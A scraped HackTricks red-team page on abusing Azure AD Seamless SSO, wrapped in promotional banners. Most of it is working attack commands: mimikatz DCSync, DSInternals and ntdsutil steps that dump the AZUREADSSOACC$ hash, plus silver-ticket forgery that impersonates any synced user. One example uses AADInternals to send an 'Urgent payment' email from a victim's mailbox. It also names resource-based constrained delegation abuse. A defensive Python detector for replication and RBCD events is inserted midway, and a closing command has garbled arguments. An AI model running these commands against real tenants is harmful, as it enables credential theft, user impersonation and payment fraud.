2024-07-13 19:44 | Source: web compilation | Views: 265

Az - Seamless SSO

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF, check the SUBSCRIPTION PLANS!

Get the official PEASS & HackTricks swag

Discover The PEASS Family, our collection of exclusive NFTs

Join the 💬 Discord group or the Telegram group, or follow us on Twitter 🐦 @hacktricks_live.

Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

From the docs: Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) automatically signs users in when they are on their corporate devices connected to your corporate network. When enabled, users don't need to type in their passwords to sign in to Azure AD, and usually, even type in their usernames. This feature provides your users easy access to your cloud-based applications without needing any additional on-premises components.

Basically, Azure AD Seamless SSO signs users in when they are on an on-prem domain-joined PC.

It's supported by both PHS (Password Hash Sync) and PTA (Pass-through Authentication).

Desktop SSO uses Kerberos for authentication. When configured, Azure AD Connect creates a computer account called AZUREADSSOACC$ in the on-prem AD. The password of the AZUREADSSOACC$ account is sent in plain text to Azure AD during the configuration.

The Kerberos tickets are encrypted using the NT hash (MD4) of that password, and Azure AD uses the password it received to decrypt the tickets.

Azure AD exposes an endpoint (https://autologon.microsoftazuread-sso.com) that accepts Kerberos tickets. A domain-joined machine's browser forwards the tickets to this endpoint for SSO.

On-prem -> cloud

The password of the AZUREADSSOACC$ account never changes. Therefore, a domain admin could obtain the hash of this account and then use it to create silver tickets to connect to Azure as any synced on-prem user:

```powershell
# Dump hash using mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"'
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit

# Dump hash using https://github.com/MichaelGrafnetter/DSInternals
Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local

# Dump using ntdsutil and DSInternals
## Dump NTDS.dit
ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q
## Extract password
Install-Module DSInternals
Import-Module DSInternals
$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM'
(Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hex
```

With the hash you can now generate silver tickets:

```powershell
# Get users and SIDs
Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier

# Create a silver ticket to connect to Azure with mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin /sid:S-1-5-21-123456789-1234567890-123456789 /id:1105 /domain:domain.local /rc4: /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'
mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:12349e088b2c13d93833d0ce947676dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit

# Create silver ticket with AADInternals to access Exchange Online
$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "097AB3CBED7B9DD6FE6C992024BC38F4"
$at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com
## Send email
Send-AADIntOutlookMessage -AccessToken $at -Recipient "[email protected]" -Subject "Urgent payment" -Message "Urgent!The following bill should be paid asap."
```

To utilize the silver ticket, the following steps should be executed:

1. Initiate the browser: launch Mozilla Firefox.

2. Configure the browser: navigate to about:config and set the preference network.negotiate-auth.trusted-uris to the following values:

   https://aadg.windows.net.nsatc.net
   https://autologon.microsoftazuread-sso.com

3. Access the web application: visit a web application that is integrated with the organization's AAD domain. A common example is Office 365.

4. Authentication process: at the logon screen, enter the username and leave the password field blank, then press either TAB or ENTER to proceed.

This does not bypass MFA if it is enabled.

Creating Kerberos tickets for cloud-only users

If the Active Directory administrators have access to Azure AD Connect, they can set the SID of any cloud-only user. This way, Kerberos tickets can also be created for cloud-only users. The only requirement is that the SID is a well-formed SID.

Changing the SID of cloud-only admin users is now blocked by Microsoft. For details, see https://aadinternals.com/post/on-prem_admin/

On-prem -> Cloud via Resource Based Constrained Delegation

Anyone who can manage computer accounts in the container or OU that AZUREADSSOACC$ sits in can configure resource-based constrained delegation over that account and access it.
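A defender-side counterpart to the two on-prem paths on this page (the hash extraction via replication in the first section and the RBCD abuse just described), as an added example that is not part of the HackTricks page: it triages Windows Security event records and flags 4662 replication rights used by a principal that is neither a domain controller nor the Azure AD Connect MSOL_ account, and 5136 writes to msDS-AllowedToActOnBehalfOfOtherIdentity on the AZUREADSSOACC computer object. The record field names, the sample records and the CN=AZUREADSSOACC DN prefix are assumptions; the replication-right GUIDs are the real AD schema values.

```python
import re

# Control-access-right GUIDs that grant directory replication (real AD schema values).
REPL_RIGHT_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
SSO_DN_PREFIX = "CN=AZUREADSSOACC,"  # DN prefix of the SSO computer object (assumption)
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)


def triage(events, dc_accounts):
    """Return (rule, subject) pairs for events worth an alert.
    dc_accounts: SAM names of domain controllers, which replicate legitimately; the
    Azure AD Connect MSOL_<id> account also holds replication rights and is expected."""
    alerts = []
    for ev in events:
        who = ev["SubjectUserName"]
        if ev["EventID"] == 4662:
            # 4662 'Properties' lists the control access rights used as {GUID} tokens
            requested = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
            expected = who in dc_accounts or who.upper().startswith("MSOL_")
            if requested & REPL_RIGHT_GUIDS and not expected:
                alerts.append(("dcsync-replication-right", who))
        elif ev["EventID"] == 5136:
            # 5136 = directory object modified; the RBCD attribute on AZUREADSSOACC$ is the tell
            if (ev.get("AttributeLDAPDisplayName") == RBCD_ATTR
                    and ev.get("ObjectDN", "").upper().startswith(SSO_DN_PREFIX)):
                alerts.append(("rbcd-on-azureadssoacc", who))
    return alerts


# Constructed sample records carrying only the EventData fields the rules read.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "MSOL_4f2a9c1b7e3d", "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 5136, "SubjectUserName": "helpdesk1", "AttributeLDAPDisplayName": RBCD_ATTR,
     "ObjectDN": "CN=AZUREADSSOACC,CN=Computers,DC=contoso,DC=local"},
    {"EventID": 5136, "SubjectUserName": "helpdesk1", "AttributeLDAPDisplayName": "description",
     "ObjectDN": "CN=WS01,CN=Computers,DC=contoso,DC=local"},
]

if __name__ == "__main__":
    for rule, who in triage(SAMPLE_EVENTS, dc_accounts={"DC01$"}):
        print(f"ALERT {rule}: {who}")
```

Both rules need directory-service access auditing (SACLs on the domain object for 4662, and on the AZUREADSSOACC object for 5136) to be enabled, or the events are never written.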

```shell
python rbdel.py -u \\ -p azureadssosvc$
```

References

https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso

https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/

https://aadinternals.com/post/on-prem_admin/

TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory
